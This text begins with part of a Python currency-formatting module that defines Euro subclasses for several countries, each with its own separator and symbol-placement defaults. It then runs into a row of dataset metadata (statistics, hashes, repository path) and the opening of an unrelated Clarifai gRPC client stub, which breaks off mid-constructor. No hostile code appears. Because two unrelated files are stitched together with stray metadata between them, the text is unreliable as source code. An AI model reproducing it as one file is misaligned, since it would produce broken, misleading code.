decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroGR':
"""Class creator.
Returns:
EuroGR: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='GR€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroIE(Currency):
"""EuroIE currency representation.
Simple usage example:
>>> from multicurrency import EuroIE
>>> euroie = EuroIE(
... amount=123456.789)
>>> print(euroie)
€123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EuroIE':
"""Class creator.
Returns:
EuroIE: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='IR€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroIT(Currency):
"""EuroIT currency representation.
Simple usage example:
>>> from multicurrency import EuroIT
>>> euroit = EuroIT(
... amount=123456.789)
>>> print(euroit)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroIT':
"""Class creator.
Returns:
EuroIT: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='IT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroXK(Currency):
"""EuroXK currency representation.
Simple usage example:
>>> from multicurrency import EuroXK
>>> euroxk = EuroXK(
... amount=123456.789)
>>> print(euroxk)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroXK':
"""Class creator.
Returns:
EuroXK: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='XK€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroLV(Currency):
"""EuroLV currency representation.
Simple usage example:
>>> from multicurrency import EuroLV
>>> eurolv = EuroLV(
... amount=123456.789)
>>> print(eurolv)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroLV':
"""Class creator.
Returns:
EuroLV: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='LV€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroLT(Currency):
"""EuroLT currency representation.
Simple usage example:
>>> from multicurrency import EuroLT
>>> eurolt = EuroLT(
... amount=123456.789)
>>> print(eurolt)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroLT':
"""Class creator.
Returns:
EuroLT: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='LT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroLU(Currency):
"""EuroLU currency representation.
Simple usage example:
>>> from multicurrency import EuroLU
>>> eurolu = EuroLU(
... amount=123456.789)
>>> print(eurolu)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroLU':
"""Class creator.
Returns:
EuroLU: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='LU€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroMT(Currency):
"""EuroMT currency representation.
Simple usage example:
>>> from multicurrency import EuroMT
>>> euromt = EuroMT(
... amount=123456.789)
>>> print(euromt)
€123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EuroMT':
"""Class creator.
Returns:
EuroMT: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='MT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroMC(Currency):
"""EuroMC currency representation.
Simple usage example:
>>> from multicurrency import EuroMC
>>> euromc = EuroMC(
... amount=123456.789)
>>> print(euromc)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroMC':
"""Class creator.
Returns:
EuroMC: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='MC€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroME(Currency):
"""EuroME currency representation.
Simple usage example:
>>> from multicurrency import EuroME
>>> eurome = EuroME(
... amount=123456.789)
>>> print(eurome)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroME':
"""Class creator.
Returns:
EuroME: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ME€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroNL(Currency):
"""EuroNL currency representation.
Simple usage example:
>>> from multicurrency import EuroNL
>>> euronl = EuroNL(
... amount=123456.789)
>>> print(euronl)
€ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroNL':
"""Class creator.
Returns:
EuroNL: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='NL€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroPT(Currency):
"""EuroPT currency representation.
Simple usage example:
>>> from multicurrency import EuroPT
>>> europt = EuroPT(
... amount=123456.789)
>>> print(europt)
€ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroPT':
"""Class creator.
Returns:
EuroPT: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='PT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSM(Currency):
"""EuroSM currency representation.
Simple usage example:
>>> from multicurrency import EuroSM
>>> eurosm = EuroSM(
... amount=123456.789)
>>> print(eurosm)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSM':
"""Class creator.
Returns:
EuroSM: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='SM€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSK(Currency):
"""EuroSK currency representation.
Simple usage example:
>>> from multicurrency import EuroSK
>>> eurosk = EuroSK(
... amount=123456.789)
>>> print(eurosk)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSK':
"""Class creator.
Returns:
EuroSK: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='SK€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSI(Currency):
"""EuroSI currency representation.
Simple usage example:
>>> from multicurrency import EuroSI
>>> eurosi = EuroSI(
... amount=123456.789)
>>> print(eurosi)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSI':
"""Class creator.
Returns:
EuroSI: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='SI€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroES(Currency):
"""EuroES currency representation.
Simple usage example:
>>> from multicurrency import EuroES
>>> euroes = EuroES(
... amount=123456.789)
>>> print(euroes)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroES':
"""Class creator.
Returns:
EuroES: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ES€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroVA(Currency):
"""EuroVA currency representation.
Simple usage example:
>>> from multicurrency import EuroVA
>>> eurova = EuroVA(
... amount=123456.789)
>>> print(eurova)
€123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EuroVA':
"""Class creator.
Returns:
EuroVA: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='VA€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
| 35.596491 | 77 | 0.584683 | 6,250 | 62,899 | 5.72864 | 0.02432 | 0.052787 | 0.036197 | 0.028656 | 0.920931 | 0.920931 | 0.920931 | 0.920931 | 0.873422 | 0.873422 | 0 | 0.017586 | 0.319274 | 62,899 | 1,766 | 78 | 35.616648 | 0.816732 | 0.493267 | 0 | 0.891963 | 0 | 0 | 0.023432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035573 | false | 0 | 0.003953 | 0 | 0.146245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef0625d83f22172d5b716a32bc66935b3664efbd | 60,934 | py | Python | clarifai/rest/grpc/proto/clarifai/api/endpoint_pb2_grpc.py | Taik/clarifai-python | c3b66b84cb348d3cb1edff958f561a4734b78650 | [
"Apache-2.0"
] | 322 | 2015-08-25T03:16:11.000Z | 2021-11-08T09:36:50.000Z | clarifai/rest/grpc/proto/clarifai/api/endpoint_pb2_grpc.py | Taik/clarifai-python | c3b66b84cb348d3cb1edff958f561a4734b78650 | [
"Apache-2.0"
] | 76 | 2015-10-25T13:03:47.000Z | 2022-02-19T09:36:10.000Z | clarifai/rest/grpc/proto/clarifai/api/endpoint_pb2_grpc.py | Taik/clarifai-python | c3b66b84cb348d3cb1edff958f561a4734b78650 | [
"Apache-2.0"
] | 136 | 2015-09-04T13:48:27.000Z | 2021-06-12T16:48:36.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from clarifai.rest.grpc.proto.clarifai.api import code_pb2 as proto_dot_clarifai_dot_api_dot_code__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_graph_pb2 as proto_dot_clarifai_dot_api_dot_concept__graph__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_language_pb2 as proto_dot_clarifai_dot_api_dot_concept__language__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_pb2 as proto_dot_clarifai_dot_api_dot_concept__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_reference_pb2 as proto_dot_clarifai_dot_api_dot_concept__reference__pb2
from clarifai.rest.grpc.proto.clarifai.api import input_pb2 as proto_dot_clarifai_dot_api_dot_input__pb2
from clarifai.rest.grpc.proto.clarifai.api import model_pb2 as proto_dot_clarifai_dot_api_dot_model__pb2
from clarifai.rest.grpc.proto.clarifai.api import model_version_pb2 as proto_dot_clarifai_dot_api_dot_model__version__pb2
from clarifai.rest.grpc.proto.clarifai.api import output_pb2 as proto_dot_clarifai_dot_api_dot_output__pb2
from clarifai.rest.grpc.proto.clarifai.api import search_pb2 as proto_dot_clarifai_dot_api_dot_search__pb2
from clarifai.rest.grpc.proto.clarifai.api.status import status_pb2 as proto_dot_clarifai_dot_api_dot_status_dot_status__pb2
from clarifai.rest.grpc.proto.clarifai.api import subscription_pb2 as proto_dot_clarifai_dot_api_dot_subscription__pb2
from clarifai.rest.grpc.proto.clarifai.api import visualization_pb2 as proto_dot_clarifai_dot_api_dot_visualization__pb2
from clarifai.rest.grpc.proto.clarifai.api import vocab_pb2 as proto_dot_clarifai_dot_api_dot_vocab__pb2
from clarifai.rest.grpc.proto.clarifai.api import workflow_pb2 as proto_dot_clarifai_dot_api_dot_workflow__pb2
class V2Stub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetConceptCounts = channel.unary_unary(
'/clarifai.api.V2/GetConceptCounts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptCountsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptCountResponse,
)
self.GetConcept = channel.unary_unary(
'/clarifai.api.V2/GetConcept',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptRequest.SerializeToString,
